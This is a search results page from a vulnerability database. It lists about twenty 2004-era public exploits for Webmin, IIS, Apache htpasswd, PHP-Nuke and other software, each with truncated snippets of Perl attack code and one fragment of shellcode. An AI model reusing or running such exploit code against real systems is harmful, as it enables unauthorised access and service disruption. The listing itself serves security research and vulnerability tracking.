Lucene search
+L

1087 matches found

zdt
zdt
added 2004/12/22 12:0 a.m.110 views

Webmin BruteForce and Command Execution Exploit

Exploit for multiple platform in category remote exploits =============================================== Webmin BruteForce and Command Execution Exploit =============================================== !/usr/bin/perl Webmin BruteForce + Command execution - By Di42lo usage ./bruteforce.webmin.pl...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
added 2004/12/22 12:0 a.m.44 views

Webmin - Brute Force / Command Execution

!/usr/bin/perl Webmin BruteForce + Command execution - By Di42lo usage ./bruteforce.webmin.pl ./bruteforce.webmin.pl 192.168.0.5 "uptime" + BruteForcing... + trying to enter with: admim + trying to enter with: admin + Found SID : f3231ff32849fa0c8c98487ba8c09dbb + Password : admin + Connecting to...

5.8AI score
SaveExploits0
zdt
zdt
added 2004/12/01 12:0 a.m.24 views

Mercury/32 Mail Server <= 4.01a (check) Buffer Overflow Exploit

Exploit for unknown platform in category dos / poc =============================================================== Mercury/32 Mail Server Mercury32Overflow.pl 127.0.0.1 hello moto Mercury/32, v4.01a, Dec 8 2003 Download: http://www.pmail.com/ use IO::Socket; use strict; my$socket = ""; if $socket...

7AI score
SaveExploits0
zdt
zdt
added 2004/11/22 12:0 a.m.95 views

Invision Power Board v2.0.0 - 2.0.2 Sql Injection Exploit

Exploit for unknown platform in category web applications ========================================================= Invision Power Board v2.0.0 - 2.0.2 Sql Injection Exploit ========================================================= !/usr/bin/perl use IO::Socket;...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2004/11/22 12:0 a.m.21 views

Invision Power Board v2.0.0 - 2.0.2 Sql Injection Exploit

No description provided by source. !/usr/bin/perl use IO::Socket;...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
added 2004/11/15 12:0 a.m.69 views

Secure Network Messenger 1.4.2 - Denial of Service

!/usr/bin/perl use IO::Socket; print "\nSecure Network Messenger Crasher by ClearScreen\n"; print "\nEnter host to crash: "; $h = ; chomp $h; $socks = IO::Socket::INET-new Proto = "tcp", PeerPort = "6144", PeerAddr = "$h" or die "\nNo response from host."; sleep 1; print "\nSuccesfully connected ...

5.8AI score
SaveExploits0
zdt
zdt
added 2004/11/11 12:0 a.m.16 views

WinFTP Server 1.6 Denial of Service Exploit

Exploit for unknown platform in category dos / poc =========================================== WinFTP Server 1.6 Denial of Service Exploit =========================================== !/usr/local/bin/perl -w WinFTP server ver 1.6 D.o.S Exploit Discovered,exploited by KaGra Tested on WinXP SP1...

7AI score
SaveExploits0
Packet Storm
Packet Storm
added 2004/10/26 12:0 a.m.20 views

iis.pl.txt

This is a multi-part message in MIME format. ------=NextPart000001D01C4B563.F871BDD0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable http://icis.digitalparadox.org/dcrab/iis.pl=20 !/usr/bin/perl -w use IO::Socket; print "\n\n"; print "IIS 5 Null Printer...

7.4AI score
SaveExploits0
Exploit DB
Exploit DB
added 2004/10/20 12:0 a.m.120 views

Microsoft IIS - WebDAV XML Denial of Service (MS04-030)

!/usr/bin/perl IIS BlowOut POC exploit for MS04-030. Found by Amit Klein. incognitoergo yahoo com usage: perl ms04-030spl.pl host port use IO::Socket; $port = @ARGV1; $host = @ARGV0; $socket = IO::Socket::INET-newPeerAddr = $host,PeerPort = $port,Proto = "TCP"; for $count=1;...

5CVSS5.8AI score0.86548EPSS
SaveExploits1
exploitpack
exploitpack
added 2004/10/20 12:0 a.m.12 views

Microsoft IIS - WebDAV XML Denial of Service (MS04-030)

Microsoft IIS - WebDAV XML Denial of Service MS04-030 !/usr/bin/perl IIS BlowOut POC exploit for MS04-030. Found by Amit Klein. incognitoergo yahoo com usage: perl ms04-030spl.pl host port use IO::Socket; $port = @ARGV1; $host = @ARGV0; $socket = IO::Socket::INET-newPeerAddr = $host,PeerPort =...

7.4AI score
SaveExploits0
zdt
zdt
added 2004/10/20 12:0 a.m.17 views

MS Windows IIS WebDAV XML Denial of Service Exploit (MS04-030)

Exploit for unknown platform in category dos / poc ============================================================== MS Windows IIS WebDAV XML Denial of Service Exploit MS04-030 ============================================================== !/usr/bin/perl IIS BlowOut POC exploit for MS04-030. Found ...

7AI score
SaveExploits0
exploitpack
exploitpack
added 2004/09/16 12:0 a.m.22 views

htpasswd Apache 1.3.31 - Local Overflow

htpasswd Apache 1.3.31 - Local Overflow !/usr/bin/perl Proof Of Concept exploit for htpasswd of Apache. Read the advisory for more information. - Luiz Fernando Camargo - foxtrotatflowsecurity.org $shellcode = "\x31\xdb\x6a\x17\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68"...

0.2AI score
SaveExploits0
Packet Storm
Packet Storm
added 2004/09/10 12:0 a.m.20 views

phpSQLnuke.pl

XSS/SQL Injection PHP-Nuke Delete Messages Bug by bima Php-Nuke is a popular freeware content management system. Based on information at : http://www.mantralab.org/modules.php/modulo/news/lanotizia/%5BXSS%5D+PHP-Nuke+7.4+Add+Message+Bug An attacker permitted to post to global home-page messages. ...

7.4AI score
SaveExploits0
securityvulns
securityvulns
added 2004/09/09 12:0 a.m.38 views

[XSS]/SQL Injection PHP-Nuke Delete Message&#40;s&#41; Bug

XSS/SQL Injection PHP-Nuke Delete Messages Bug by bima Php-Nuke is a popular freeware content management system. Based on information at : http://www.mantralab.org/modules.php/modulo/news/lanotizia/5BXSS5D+PHP-Nuke+7.4+Add+Message+Bug An attacker permitted to post to global home-page messages. I...

7AI score
SaveExploits0
seebug.org
seebug.org
added 2004/08/20 12:0 a.m.23 views

phpMyWebhosting SQL Injection Exploit

No description provided by source. !/usr/bin/perl Exploit code by Noam Rathaus of Beyond Security Ltd. The following exploit code will use a valid username and password combination, to cause an SQL injection. Using the SQL injection, the Perl script elevates the privileges of the user provided to...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
added 2004/08/20 12:0 a.m.36 views

phpMyWebhosting - SQL Injection

!/usr/bin/perl Exploit code by Noam Rathaus of Beyond Security Ltd. The following exploit code will use a valid username and password combination, to cause an SQL injection. Using the SQL injection, the Perl script elevates the privileges of the user provided to administrative. use IO::Socket; us...

7.5CVSS5.8AI score0.02444EPSS
SaveExploits2
exploitpack
exploitpack
added 2004/08/20 12:0 a.m.28 views

phpMyWebhosting - SQL Injection

phpMyWebhosting - SQL Injection !/usr/bin/perl Exploit code by Noam Rathaus of Beyond Security Ltd. The following exploit code will use a valid username and password combination, to cause an SQL injection. Using the SQL injection, the Perl script elevates the privileges of the user provided to...

0.2AI score
SaveExploits0
zdt
zdt
added 2004/08/20 12:0 a.m.73 views

phpMyWebhosting SQL Injection Exploit

Exploit for unknown platform in category web applications ===================================== phpMyWebhosting SQL Injection Exploit ===================================== !/usr/bin/perl Exploit code by Noam Rathaus of Beyond Security Ltd. The following exploit code will use a valid username and...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
added 2004/08/19 12:0 a.m.45 views

PlaySms 0.7 - SQL Injection

!/usr/bin/perl PlaySMS version 0.7 and prior SQL Injection PoC Written by Noam Rathaus of Beyond Security Ltd. use IO::Socket; use strict; my $host = $ARGV0; my $remote = IO::Socket::INET-new Proto = "tcp", PeerAddr = $host, PeerPort = "80" ; unless $remote die "cannot connect to http daemon on...

7.5CVSS5.8AI score0.01353EPSS
SaveExploits2
zdt
zdt
added 2004/08/05 12:0 a.m.16 views

BlackJumboDog Remote Buffer Overflow Exploit

Exploit for unknown platform in category remote exploits ============================================ BlackJumboDog Remote Buffer Overflow Exploit ============================================ !/usr/bin/perl blackJumboDog Exploit code by Tal zeltzer use strict; use IO::Socket::INET; usage...

7.1AI score
SaveExploits0
Rows per page
Query Builder